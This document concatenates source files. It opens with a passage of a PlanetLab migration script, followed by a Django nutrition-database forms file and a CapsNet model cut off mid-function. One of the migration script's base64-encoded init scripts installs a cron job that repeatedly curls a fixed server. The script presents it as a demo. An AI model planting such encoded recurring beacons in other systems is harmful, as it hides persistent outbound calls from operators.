Y2thZ2VzIGluIHRoZSByZXBvc2l0b3J5LiINCiAgIGVjaG8NCiAgIGVjaG8gIkZvciBtb3JlIGhlbHAsIHZpc2l0IHRoZSBzdG9yayBwcm9qZWN0IG9ubGluZSBhdCINCiAgIGVjaG8gImh0dHA6Ly93d3cuY3MuYXJpem9uYS5lZHUvc3RvcmsvLiAgUGxlYXNlIGNvbnRhY3QiDQogICBlY2hvICJzdG9yay1zdXBwb3J0QGNzLmFyaXpvbmEuZWR1IGZvciBhZGRpdGlvbmFsIGFzc2lzdGFuY2UuIiANCmVsc2UNCiAgIGVjaG8NCiAgIGVjaG8gIkFuIGVycm9yIG9jY3VycmVkIGR1cmluZyBpbnN0YWxsIGZpbmFsaXphdGlvbi4uLiAgUGxlYXNlIGNvbnRhY3QiDQogICBlY2hvICJzdG9yay1zdXBwb3J0QGNzLmFyaXpvbmEuZWR1IGZvciBhc3Npc3RhbmNlLiINCiAgIGV4aXQgMQ0KZmkNCg0KIw0KIyBIZWxsbyBXb3JsZCBkZW1vIGNvZGUNCiMNCg0KIyBQdWJsaWMga2V5IGZvciB0aGlzIGRlbW8NCmNhdCA+L3Vzci9sb2NhbC9zdG9yay92YXIva2V5cy9oZWxsby5wdWJsaWNrZXkgPDwiRU9GIg0KLS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0NCk1Gd3dEUVlKS29aSWh2Y05BUUVCQlFBRFN3QXdTQUpCQU1XcVE3K2VxQVljNlRPSUJPbkJyRnZqYjlnRVViaWgNCkkxd0Nyeld4a09aa01BcXFmY1RuMW9tcCtLMGd0cUtBK3VaNEIzRGlQRXI0Q0V0Myt5MmJlMGtDQXdFQUFRPT0NCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ0KRU9GDQpzZWQgLWkgLWUgJ3MvXnVzZXJuYW1lLiovdXNlcm5hbWUgPSBoZWxsby8nIC91c3IvbG9jYWwvc3RvcmsvZXRjL3N0b3JrLmNvbmYNCg0KIyBJbnN0YWxsIFJQTQ0Kc3RvcmsgdXBncmFkZSBoZWxsbw0KDQojIGVuZA0KZXhpdCAwDQo=', 'name': 'princeton_hello_stork', 'encoding': 'base64'}, {'initscript_id': 10, 'script': 'IyEvYmluL2Jhc2gNCg0KIyBJbml0IHNjcmlwdCBmb3IgdGhlIFBsYW5ldExhYiAiSGVsbG8gV29ybGQiIGRlbW8gdXNpbmcgR29vZ2xlIEVhcnRoLg0KIyBJbnN0YWxscyBhIGNyb250YWIgZW50cnkgb24gdGhlIG5vZGUgdGhhdCBwaG9uZXMgaG9tZSB0byB0aGUgc2VydmVyDQojIGV2ZXJ5IHRocmVlIG1pbnV0ZXMuDQoNClNFUlZFUj0xMjguMTEyLjEzOS43Mzo4MDQyCQkjIHBsYW5ldGxhYi0zLmNzLnByaW5jZXRvbi5lZHUNCg0KL3Vzci9iaW4vY3VybCAtcyBodHRwOi8vJFNFUlZFUi8NCmVjaG8gIiovNSAqICogKiAqIC91c3IvYmluL2N1cmwgLXMgaHR0cDovLyRTRVJWRVIvIiB8IGNyb250YWIgLQ0KL3NiaW4vY2hrY29uZmlnIGNyb25kIG9uDQo=', 'name': 'princeton_hello', 'encoding': 'base64'}]])
# Convert plc_initscript.initscript_id to raw initscript attribute
for slice_attribute in GetSliceTags({'name': 'plc_initscript'}):
    id = slice_attribute['slice_attribute_id']
    slice_id = slice_attribute['slice_id']
    initscript_id = int(slice_attribute['value'])
    # Delete old attribute
    DeleteSliceTag(id)
    if initscript_id not in initscripts:
        print("Warning: Missing initscript %d" % initscript_id)
        continue
    # Scripts are stored base64-encoded; decode back to text before re-adding
    initscript = base64.b64decode(initscripts[initscript_id]['script']).decode()
    # Add as initscript attribute
    AddSliceTag(slice_id, 'initscript', initscript)
# Add our custom yum.conf entries
conf_file_id = AddConfFile({
    'enabled': True,
    'source': 'PlanetLabConf/yum.conf.php?gpgcheck=1&alpha',
    'dest': '/etc/yum.conf',
    'file_permissions': '644',
    'file_owner': 'root',
    'file_group': 'root',
    'preinstall_cmd': '',
    'postinstall_cmd': '',
    'error_cmd': '',
    'ignore_cmd_errors': False,
    'always_update': False})
AddConfFileToNodeGroup(conf_file_id, 'Alpha')

conf_file_id = AddConfFile({
    'enabled': True,
    'source': 'PlanetLabConf/yum.conf.php?gpgcheck=1&beta',
    'dest': '/etc/yum.conf',
    'file_permissions': '644',
    'file_owner': 'root',
    'file_group': 'root',
    'preinstall_cmd': '',
    'postinstall_cmd': '',
    'error_cmd': '',
    'ignore_cmd_errors': False,
    'always_update': False})
AddConfFileToNodeGroup(conf_file_id, 'Beta')

conf_file_id = AddConfFile({
    'enabled': True,
    'source': 'PlanetLabConf/yum.conf.php?gpgcheck=1&rollout',
    'dest': '/etc/yum.conf',
    'file_permissions': '644',
    'file_owner': 'root',
    'file_group': 'root',
    'preinstall_cmd': '',
    'postinstall_cmd': '',
    'error_cmd': '',
    'ignore_cmd_errors': False,
    'always_update': False})
AddConfFileToNodeGroup(conf_file_id, 'Rollout')
# Add OneLab as a peer
onelab = {'peername': 'OneLab', 'peer_url': 'https://onelab-plc.inria.fr/PLCAPI/', 'key': '-----BEGIN PGP PUBLIC KEY BLOCK-----\nVersion: GnuPG v1.4.5 (GNU/Linux)\n\nmQGiBEW0kJMRBACaTlrW0eYlQwkzRuMFfEYMwyqBT9Bm6R4g68SJ5GdjCRu3XCnd\nGTGCFF4ewOu6IcUmZDv39eqxShBWyx+JqBogYPGNvPrj07jXXKaSBCM7TPk+9kMW\nPziIxSClvO15XaPKv89c6kFaEBe0z1xsoMB/TNoLmhFUxmc24O7JnEqmYwCgjzIS\nHP7u9KIOYk1ZlTdOtwyRxVkD/1uYbPzD0Qigf8uF9ADzx7I4F1ATd2ezYq0EfzhD\nTDa15FPWwA7jm+Mye//ovT01Ju6JQtCU4N9wRsV2Yy2tWcWFZiYt+BISPVS0lJDx\nQ2Cd2+kEWyl9ByL9/ACHmCUz0OOaz9j1x+GpJLArjUdZSJOs68kPw90F62mrLHfg\nYCHpA/0ZcdJQG9QYNZ67KMFqNPho+uRww5/7kxQ4wkSyP7EK3QUVgXG5OWZ/1mPZ\njon9N04nnjrL9qoQv7m04ih3rmqyGy1MsicNCoys0RNh1eavPdAsXD1ZEXnWPA7z\naC37hxUaRPP3hH+1ifjPpAWQX1E89MK2y2zQpZipvEOAO2Lw8LRCT25lTGFiIENl\nbnRyYWwgKGh0dHA6Ly9vbmVsYWItcGxjLmlucmlhLmZyLykgPHN1cHBvcnRAb25l\nLWxhYi5vcmc+iGAEExECACAFAkW0kJMCGyMGCwkIBwMCBBUCCAMEFgIDAQIeAQIX\ngAAKCRBuu7E0vzFd9fvbAJ9QB2neTSbAN5HuoigIbuKzTUCTjQCeM/3h7/OmjD+z\n6yXtWD4Fzyfr7fSIYAQTEQIAIAUCRbibbAIbIwYLCQgHAwIEFQIIAwQWAgMBAh4B\nAheAAAoJEG67sTS/MV31w3AAn2t6qb94HIPmqCoD/ptK34Dv+VW0AJ4782ffPPnk\nbVXHU/Sx31QCoFmj34hgBBMRAgAgBQJFtJJBAhsjBgsJCAcDAgQVAggDBBYCAwEC\nHgECF4AACgkQbruxNL8xXfU5UQCeKqXWeNzTqdMqj/qHPkp1JCb+isEAn2AzDnde\nITF0aYd02RAKsU4sKePEtEJPbmVMYWIgQ2VudHJhbCAoaHR0cDovL29uZWxhYi1w\nbGMuaW5yaWEuZnIvKSA8c3VwcG9ydEBvbmUtbGFiLm9yZz6IYAQTEQIAIAUCRbi2\npgIbIwYLCQgHAwIEFQIIAwQWAgMBAh4BAheAAAoJEG67sTS/MV31W4AAn0rW5yjR\n2a8jPP/V44gw1JhqnE8jAKCMAEh0nPjvle5oLEGectC3Es9Pm7kBDQRFtJCUEAQA\nhp38fNVy/aJiPg2lUKKnA6KjrRm3LxD66N8MSWfxGCIYzQRJHhmZWnS+m1DDOjdu\nFG9FM6QrsCRRcEQuvhKI2ORFfK75D24lj4QaXzw7vfBbAibTaDsYa0b5LxfR5pGj\nYPCQ5LrRex+Ws3DrB3acJE5/XnYJZ+rUO1ZJlm00FTMAAwUD/Ai4ZUunVB8F0VqS\nhJgDYQF08/OlAnDAcbL//P5dtXdztUNSgXZM4wW/XFnDvAsBuRnbfkT/3BeptM9L\neEbdrMi4eThLstSl13ITOsZbSL3i/2OO9sPAxupWzRWOXcQILpqR2YMRK1EapO+M\nNhjrgxU9JpMXz24FESocczSyywDXiEkEGBECAAkFAkW0kJQCGwwACgkQbruxNL8x\nXfXGxQCfZqzSqinohParWaHv+4XNoIz2B7IAn2Ge0O5wjYZeV/joulkTXfPKm7Iu\n=SsZg\n-----END PGP PUBLIC KEY BLOCK-----\n', 'cacert': 'Certificate:\r\n Data:\r\n Version: 3 (0x2)\r\n Serial Number: 67109883 (0x40003fb)\r\n Signature Algorithm: sha1WithRSAEncryption\r\n Issuer: C=US, O=GTE Corporation, OU=GTE CyberTrust Solutions, Inc., CN=G\r\n Validity\r\n Not Before: Mar 14 20:30:00 2006 GMT\r\n Not After : Mar 14 23:59:00 2013 GMT\r\n Subject: C=BE, O=Cybertrust, OU=Educational CA, CN=Cybertrust Educationa\r\n Subject Public Key Info:\r\n Public Key Algorithm: rsaEncryption\r\n RSA Public Key: (2048 bit)\r\n Modulus (2048 bit):\r\n 00:95:22:a1:10:1d:4a:46:60:6e:05:91:9b:df:83:\r\n c2:ed:12:b2:5a:7c:f8:ab:e1:f8:50:5c:28:2c:7e:\r\n 7e:00:38:93:b0:8b:4a:f1:c2:4c:3c:10:2c:3c:ef:\r\n b0:ec:a1:69:2f:b9:fc:cc:08:14:6b:8d:4f:18:f3:\r\n 83:d2:fa:a9:37:08:20:aa:5c:aa:80:60:a2:d5:a5:\r\n 22:00:cf:5a:e5:b4:97:df:ba:1e:be:5c:8e:17:19:\r\n 66:fd:af:9f:7c:7b:89:b2:0e:24:d8:c7:ab:63:c4:\r\n 95:32:8d:48:e6:63:59:7d:04:b8:33:a8:bd:d7:5d:\r\n 64:bc:63:b5:f7:4d:28:fd:f9:06:72:31:5c:ba:45:\r\n 94:65:a3:d2:b4:58:ec:3b:61:58:44:a3:2f:62:b3:\r\n 9b:80:b4:82:fd:d5:c7:cc:51:25:e5:95:3f:47:2f:\r\n 30:7b:ac:c8:78:6e:e2:e1:6d:27:eb:3d:cc:01:82:\r\n e8:35:77:8d:ab:58:bb:55:d1:d5:a4:81:56:8d:1c:\r\n d0:14:b1:b0:06:de:a0:91:22:f3:f0:a8:34:17:47:\r\n c6:e0:3e:f6:0c:5a:ac:7e:50:4b:cd:e1:69:6e:06:\r\n fc:06:7e:6a:4d:b4:95:99:a0:59:5c:35:66:ec:d9:\r\n 49:d4:17:e0:60:b0:5d:a5:d7:1a:e2:2a:6e:66:f2:\r\n af:1d\r\n Exponent: 65537 (0x10001)\r\n X509v3 extensions:\r\n X509v3 CRL Distribution Points: \r\n URI:http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl\r\n\r\n X509v3 Subject Key 
Identifier: \r\n 65:65:A3:3D:D7:3B:11:A3:0A:07:25:37:C9:42:4A:5B:76:77:50:E1\r\n X509v3 Certificate Policies: \r\n Policy: 1.3.6.1.4.1.6334.1.0\r\n CPS: http://www.public-trust.com/CPS/OmniRoot.html\r\n\r\n X509v3 Authority Key Identifier: \r\n DirName:/C=US/O=GTE Corporation/OU=GTE CyberTrust Solutions, Inc\r\n serial:01:A5\r\n\r\n X509v3 Key Usage: critical\r\n Certificate Sign, CRL Sign\r\n X509v3 Basic Constraints: critical\r\n CA:TRUE, pathlen:0\r\n Signature Algorithm: sha1WithRSAEncryption\r\n 43:b3:45:83:54:71:c4:1f:dc:b2:3c:6b:4e:bf:26:f2:4e:f2:\r\n ad:9a:5b:fa:86:37:88:e8:14:6c:41:18:42:5f:ef:65:3e:eb:\r\n 03:77:a0:b7:9e:75:7a:51:7c:bb:15:5b:b8:af:91:a0:34:92:\r\n 53:ed:7f:2a:49:84:ac:b9:80:4b:b5:c7:b2:23:22:fb:eb:d8:\r\n fb:6e:c9:3c:f3:d2:d1:bb:be:c9:1c:ff:6d:01:db:69:80:0e:\r\n 99:a5:ea:9e:7b:97:98:8f:b7:cf:22:9c:b3:b8:5d:e5:a9:33:\r\n 17:74:c6:97:37:0f:b4:e9:26:82:5f:61:0b:3f:1e:3d:64:e9:\r\n 2b:9b\r\n-----BEGIN CERTIFICATE-----\r\nMIIEQjCCA6ugAwIBAgIEBAAD+zANBgkqhkiG9w0BAQUFADB1MQswCQYDVQQGEwJV\r\nUzEYMBYGA1UEChMPR1RFIENvcnBvcmF0aW9uMScwJQYDVQQLEx5HVEUgQ3liZXJU\r\ncnVzdCBTb2x1dGlvbnMsIEluYy4xIzAhBgNVBAMTGkdURSBDeWJlclRydXN0IEds\r\nb2JhbCBSb290MB4XDTA2MDMxNDIwMzAwMFoXDTEzMDMxNDIzNTkwMFowXzELMAkG\r\nA1UEBhMCQkUxEzARBgNVBAoTCkN5YmVydHJ1c3QxFzAVBgNVBAsTDkVkdWNhdGlv\r\nbmFsIENBMSIwIAYDVQQDExlDeWJlcnRydXN0IEVkdWNhdGlvbmFsIENBMIIBIjAN\r\nBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAlSKhEB1KRmBuBZGb34PC7RKyWnz4\r\nq+H4UFwoLH5+ADiTsItK8cJMPBAsPO+w7KFpL7n8zAgUa41PGPOD0vqpNwggqlyq\r\ngGCi1aUiAM9a5bSX37oevlyOFxlm/a+ffHuJsg4k2MerY8SVMo1I5mNZfQS4M6i9\r\n111kvGO1900o/fkGcjFcukWUZaPStFjsO2FYRKMvYrObgLSC/dXHzFEl5ZU/Ry8w\r\ne6zIeG7i4W0n6z3MAYLoNXeNq1i7VdHVpIFWjRzQFLGwBt6gkSLz8Kg0F0fG4D72\r\nDFqsflBLzeFpbgb8Bn5qTbSVmaBZXDVm7NlJ1BfgYLBdpdca4ipuZvKvHQIDAQAB\r\no4IBbzCCAWswRQYDVR0fBD4wPDA6oDigNoY0aHR0cDovL3d3dy5wdWJsaWMtdHJ1\r\nc3QuY29tL2NnaS1iaW4vQ1JMLzIwMTgvY2RwLmNybDAdBgNVHQ4EFgQUZWWjPdc7\r\nEaMKByU3yUJKW3Z3UOEwUwYDVR0gBEwwSjBIBgkrBgEEAbE+AQAwOzA5BggrBgEF\r\nBQcCARYtaHR0cDovL3d3dy5wdWJsaWMtdHJ1c3QuY29tL0NQUy9PbW5pUm9vdC5o\r\ndG1sMIGJBgNVHSMEgYEwf6F5pHcwdTELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD0dU\r\nRSBDb3Jwb3JhdGlvbjEnMCUGA1UECxMeR1RFIEN5YmVyVHJ1c3QgU29sdXRpb25z\r\nLCBJbmMuMSMwIQYDVQQDExpHVEUgQ3liZXJUcnVzdCBHbG9iYWwgUm9vdIICAaUw\r\nDgYDVR0PAQH/BAQDAgEGMBIGA1UdEwEB/wQIMAYBAf8CAQAwDQYJKoZIhvcNAQEF\r\nBQADgYEAQ7NFg1RxxB/csjxrTr8m8k7yrZpb+oY3iOgUbEEYQl/vZT7rA3egt551\r\nelF8uxVbuK+RoDSSU+1/KkmErLmAS7XHsiMi++vY+27JPPPS0bu+yRz/bQHbaYAO\r\nmaXqnnuXmI+3zyKcs7hd5akzF3TGlzcPtOkmgl9hCz8ePWTpK5s=\r\n-----END CERTIFICATE-----\r\nCertificate:\r\n Data:\r\n Version: 1 (0x0)\r\n Serial Number: 421 (0x1a5)\r\n Signature Algorithm: md5WithRSAEncryption\r\n Issuer: C=US, O=GTE Corporation, OU=GTE CyberTrust Solutions, Inc., CN=GTE CyberTrust Global Root\r\n Validity\r\n Not Before: Aug 13 00:29:00 1998 GMT\r\n Not After : Aug 13 23:59:00 2018 GMT\r\n Subject: C=US, O=GTE Corporation, OU=GTE CyberTrust Solutions, Inc., CN=GTE CyberTrust Global Root\r\n Subject Public Key Info:\r\n Public Key Algorithm: rsaEncryption\r\n RSA Public Key: (1024 bit)\r\n Modulus (1024 bit):\r\n 00:95:0f:a0:b6:f0:50:9c:e8:7a:c7:88:cd:dd:17:\r\n 0e:2e:b0:94:d0:1b:3d:0e:f6:94:c0:8a:94:c7:06:\r\n c8:90:97:c8:b8:64:1a:7a:7e:6c:3c:53:e1:37:28:\r\n 73:60:7f:b2:97:53:07:9f:53:f9:6d:58:94:d2:af:\r\n 8d:6d:88:67:80:e6:ed:b2:95:cf:72:31:ca:a5:1c:\r\n 72:ba:5c:02:e7:64:42:e7:f9:a9:2c:d6:3a:0d:ac:\r\n 8d:42:aa:24:01:39:e6:9c:3f:01:85:57:0d:58:87:\r\n 45:f8:d3:85:aa:93:69:26:85:70:48:80:3f:12:15:\r\n c7:79:b4:1f:05:2f:3b:62:99\r\n Exponent: 65537 (0x10001)\r\n 
Signature Algorithm: md5WithRSAEncryption\r\n 6d:eb:1b:09:e9:5e:d9:51:db:67:22:61:a4:2a:3c:48:77:e3:\r\n a0:7c:a6:de:73:a2:14:03:85:3d:fb:ab:0e:30:c5:83:16:33:\r\n 81:13:08:9e:7b:34:4e:df:40:c8:74:d7:b9:7d:dc:f4:76:55:\r\n 7d:9b:63:54:18:e9:f0:ea:f3:5c:b1:d9:8b:42:1e:b9:c0:95:\r\n 4e:ba:fa:d5:e2:7c:f5:68:61:bf:8e:ec:05:97:5f:5b:b0:d7:\r\n a3:85:34:c4:24:a7:0d:0f:95:93:ef:cb:94:d8:9e:1f:9d:5c:\r\n 85:6d:c7:aa:ae:4f:1f:22:b5:cd:95:ad:ba:a7:cc:f9:ab:0b:\r\n 7a:7f\r\n-----BEGIN CERTIFICATE-----\r\nMIICWjCCAcMCAgGlMA0GCSqGSIb3DQEBBAUAMHUxCzAJBgNVBAYTAlVTMRgwFgYD\r\nVQQKEw9HVEUgQ29ycG9yYXRpb24xJzAlBgNVBAsTHkdURSBDeWJlclRydXN0IFNv\r\nbHV0aW9ucywgSW5jLjEjMCEGA1UEAxMaR1RFIEN5YmVyVHJ1c3QgR2xvYmFsIFJv\r\nb3QwHhcNOTgwODEzMDAyOTAwWhcNMTgwODEzMjM1OTAwWjB1MQswCQYDVQQGEwJV\r\nUzEYMBYGA1UEChMPR1RFIENvcnBvcmF0aW9uMScwJQYDVQQLEx5HVEUgQ3liZXJU\r\ncnVzdCBTb2x1dGlvbnMsIEluYy4xIzAhBgNVBAMTGkdURSBDeWJlclRydXN0IEds\r\nb2JhbCBSb290MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCVD6C28FCc6HrH\r\niM3dFw4usJTQGz0O9pTAipTHBsiQl8i4ZBp6fmw8U+E3KHNgf7KXUwefU/ltWJTS\r\nr41tiGeA5u2ylc9yMcqlHHK6XALnZELn+aks1joNrI1CqiQBOeacPwGFVw1Yh0X4\r\n04Wqk2kmhXBIgD8SFcd5tB8FLztimQIDAQABMA0GCSqGSIb3DQEBBAUAA4GBAG3r\r\nGwnpXtlR22ciYaQqPEh346B8pt5zohQDhT37qw4wxYMWM4ETCJ57NE7fQMh017l9\r\n3PR2VX2bY1QY6fDq81yx2YtCHrnAlU66+tXifPVoYb+O7AWXX1uw16OFNMQkpw0P\r\nlZPvy5TYnh+dXIVtx6quTx8itc2VrbqnzPmrC3p/\r\n-----END CERTIFICATE-----\r\n'}
AddPeer(onelab)

File: cnf_xplor/item_enter/forms.py (Python, 3,710 bytes, MIT license)
Repo: BFSSI-Bioinformatics-Lab/nutrition_database @ ef63be35ceb4d37f3fa94bd6e4e8c8f3c84f8b7b

import django.forms as forms
from cnf_xplor.api.models import Food, FoodGroup, FoodSource, Nutrient, ConversionFactor, Measure


class EnterFood(forms.ModelForm):
    class Meta:
        model = Food
        fields = ["GROUP", "SOURCE", "COUNTRY_C", "FOOD_DESC", "FOOD_DESC_F", "COMMENT_T", "FN_COMMENT_F"]

    GROUP = forms.ModelChoiceField(queryset=FoodGroup.objects.order_by('GROUP_C'), widget=forms.Select(attrs={'class': 'enter-item'}), required=False)
    SOURCE = forms.ModelChoiceField(queryset=FoodSource.objects.order_by('SOURCE_C'), widget=forms.Select(attrs={'class': 'enter-item'}), required=False)
    COUNTRY_C = forms.IntegerField(widget=forms.NumberInput(attrs={'class': 'enter-item'}), required=False)
    FOOD_DESC = forms.CharField(widget=forms.TextInput(attrs={'class': 'enter-item'}), required=False)
    FOOD_DESC_F = forms.CharField(widget=forms.TextInput(attrs={'class': 'enter-item'}), required=False)
    COMMENT_T = forms.CharField(widget=forms.TextInput(attrs={'class': 'enter-item'}), required=False)
    FN_COMMENT_F = forms.CharField(widget=forms.TextInput(attrs={'class': 'enter-item'}), required=False)
    # REASON_FOR_CHANGE = forms.CharField(widget=forms.TextInput(attrs={'class': 'enter-item'}), required=False)


class UpdateFood(forms.ModelForm):
    class Meta:
        model = Food
        fields = ["GROUP", "SOURCE", "COUNTRY_C", "FOOD_DESC", "FOOD_DESC_F", "COMMENT_T", "FN_COMMENT_F"]

    GROUP = forms.ModelChoiceField(queryset=FoodGroup.objects.order_by('GROUP_C'), widget=forms.Select(attrs={'class': 'enter-item'}), required=False)
    SOURCE = forms.ModelChoiceField(queryset=FoodSource.objects.order_by('SOURCE_C'), widget=forms.Select(attrs={'class': 'enter-item'}), required=False)
    COUNTRY_C = forms.IntegerField(widget=forms.NumberInput(attrs={'class': 'enter-item'}), required=False)
    FOOD_DESC = forms.CharField(widget=forms.TextInput(attrs={'class': 'enter-item'}), required=False)
    FOOD_DESC_F = forms.CharField(widget=forms.TextInput(attrs={'class': 'enter-item'}), required=False)
    COMMENT_T = forms.CharField(widget=forms.TextInput(attrs={'class': 'enter-item'}), required=False)
    FN_COMMENT_F = forms.CharField(widget=forms.TextInput(attrs={'class': 'enter-item'}), required=False)
    REASON_FOR_CHANGE = forms.CharField(widget=forms.TextInput(attrs={'class': 'enter-item'}), required=False)


class EnterNutrient(forms.ModelForm):
    class Meta:
        model = Nutrient
        fields = ["NUTR_SYMBOL", "NUTR_NAME", "NUTR_NAME_F", "UNIT"]

    NUTR_SYMBOL = forms.CharField(widget=forms.TextInput(attrs={'class': 'enter-item'}), required=False)
    NUTR_NAME = forms.CharField(widget=forms.TextInput(attrs={'class': 'enter-item'}), required=False)
    NUTR_NAME_F = forms.CharField(widget=forms.TextInput(attrs={'class': 'enter-item'}), required=False)
    UNIT = forms.CharField(widget=forms.TextInput(attrs={'class': 'enter-item'}), required=False)


class EnterConversionFactor(forms.ModelForm):
    class Meta:
        model = ConversionFactor
        fields = ["FOOD_C", "MEASURE_ID", "CONV_FACTOR", "COMMENT_T", "CF_COMMENT_F"]

    FOOD_C = forms.ModelChoiceField(queryset=Food.objects.order_by('FOOD_C'), widget=forms.Select(attrs={'class': 'enter-item'}), required=False)
    MEASURE_ID = forms.ModelChoiceField(queryset=Measure.objects.order_by('MEASURE_ID'), widget=forms.Select(attrs={'class': 'enter-item'}), required=False)
    CONV_FACTOR = forms.CharField(widget=forms.TextInput(attrs={'class': 'enter-item'}), required=False)
    COMMENT_T = forms.CharField(widget=forms.TextInput(attrs={'class': 'enter-item'}), required=False)
    CF_COMMENT_F = forms.CharField(widget=forms.TextInput(attrs={'class': 'enter-item'}), required=False)
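
A minimal usage sketch, not part of the original file: one way these ModelForms
might be wired into a Django view. The view function, URL name, and template
path below are assumptions for illustration only.

# Hypothetical view using EnterFood (URL name and template path are assumptions)
from django.shortcuts import redirect, render

from cnf_xplor.item_enter.forms import EnterFood


def enter_food(request):
    # Bind submitted data on POST; otherwise render an empty form
    form = EnterFood(request.POST or None)
    if request.method == 'POST' and form.is_valid():
        form.save()  # ModelForm persists a new Food row
        return redirect('enter_food')
    return render(request, 'item_enter/enter_food.html', {'form': form})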

File: models/efficient_capsnet_graph_AIS.py (Python, 8,885 bytes, Apache-2.0 license)
Repo: whongfeiHK/AIS-curve-prediction-Deep-Learning @ b1f321c6fa6fbd2c854e7d9d16953ca49519bc1a

import numpy as np
import tensorflow as tf
from utils.layers import PrimaryCaps, FCCaps, Length, Mask
from keras import regularizers


def efficient_capsnet_graph(input_shape):
    """
    Efficient-CapsNet graph architecture.

    Parameters
    ----------
    input_shape: list
        network input shape
    """
    inputs = tf.keras.Input(input_shape)
    #x = tf.keras.layers.Conv2D(32,5,2,activation="relu", padding='valid', kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01), activity_regularizer=regularizers.l2(0.01),kernel_initializer='he_normal')(inputs)
    #x = tf.keras.layers.BatchNormalization()(x)
    #x = tf.keras.layers.Conv2D(64,4,2, activation='relu', padding='valid', kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01), kernel_initializer='he_normal')(x)
    #x = tf.keras.layers.BatchNormalization()(x)
    #x = tf.keras.layers.Conv2D(64,3,2, activation='relu', padding='valid', kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01), kernel_initializer='he_normal')(x)
    #x = tf.keras.layers.BatchNormalization()(x)
    #x = tf.keras.layers.Conv2D(128,2,2,activation='relu', padding='valid', kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),kernel_initializer='he_normal')(x)
    #x = tf.keras.layers.BatchNormalization()(x)
    #x = PrimaryCaps(128, (18,11), 16, 8)(x)
    x = tf.keras.layers.Conv2D(32,(4,3),2,activation="relu", padding='valid', kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01), activity_regularizer=regularizers.l2(0.01),kernel_initializer='he_normal')(inputs)
    x = tf.keras.layers.BatchNormalization()(x)
    print(x.shape)
    x = tf.keras.layers.Conv2D(32,3,2, activation='relu', padding='valid', kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01), kernel_initializer='he_normal')(x)
    x = tf.keras.layers.BatchNormalization()(x)
    x = tf.keras.layers.Conv2D(64,3,2, activation='relu', padding='valid', kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01), kernel_initializer='he_normal')(x)
    x = tf.keras.layers.BatchNormalization()(x)
    x = tf.keras.layers.Conv2D(64,(3,2),activation='relu', padding='valid', kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01), kernel_initializer='he_normal')(x)
    x = tf.keras.layers.BatchNormalization()(x)
    print(x.shape)
    x = tf.keras.layers.Conv2D(128,(2,1),activation='relu', padding='valid', kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),kernel_initializer='he_normal')(x)
    x = tf.keras.layers.BatchNormalization()(x)
    x = PrimaryCaps(128,(14,10), 16, 8)(x)
    digit_caps = FCCaps(2,16)(x)
    digit_caps_len = Length(name='length_capsnet_output')(digit_caps)
    return tf.keras.Model(inputs=inputs, outputs=[digit_caps, digit_caps_len], name='Efficient_CapsNet')
def generator_graph(input_shape):
    """
    Generator graph architecture.

    Parameters
    ----------
    input_shape: list
        network input shape
    """
    inputs = tf.keras.Input(16*2)
    #x = tf.keras.layers.Dense(198)(inputs)
    #x = tf.keras.layers.Reshape(target_shape=(18,11,1))(x)
    #x = tf.keras.layers.UpSampling2D(size=(3,2), interpolation='bilinear')(x) #54,22
    #x = tf.keras.layers.Conv2D(16, (2,4), (2,1), kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.leaky_relu)(x) #27,19
    #x = tf.keras.layers.UpSampling2D(size=(3,3), interpolation='bilinear')(x) #81,57
    #x = tf.keras.layers.Conv2D(16, (3,4), kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.leaky_relu)(x) #79,55
    #x = tf.keras.layers.UpSampling2D(size=(2,2), interpolation='bilinear')(x) #158,110
    #x = tf.keras.layers.Conv2D(32, (3,4), kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.leaky_relu)(x) #156 105
    #x = tf.keras.layers.Conv2D(32, (4,3), kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.leaky_relu)(x) #153 103
    #x = tf.keras.layers.UpSampling2D(size=(2,2), interpolation='bilinear')(x) #306, 206
    #x = tf.keras.layers.Conv2D(16, (4,4), kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.leaky_relu)(x)
    #x = tf.keras.layers.Conv2D(1, (4,4), kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.sigmoid)(x) #300,200
    x = tf.keras.layers.Dense(140)(inputs)
    x = tf.keras.layers.Reshape(target_shape=(14,10,1))(x)
    x = tf.keras.layers.UpSampling2D(size=(2,2), interpolation='bilinear')(x) #28,20
    x = tf.keras.layers.Conv2D(16, 3, kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.leaky_relu)(x) #26,18
    x = tf.keras.layers.UpSampling2D(size=(3,3), interpolation='bilinear')(x) #78,54
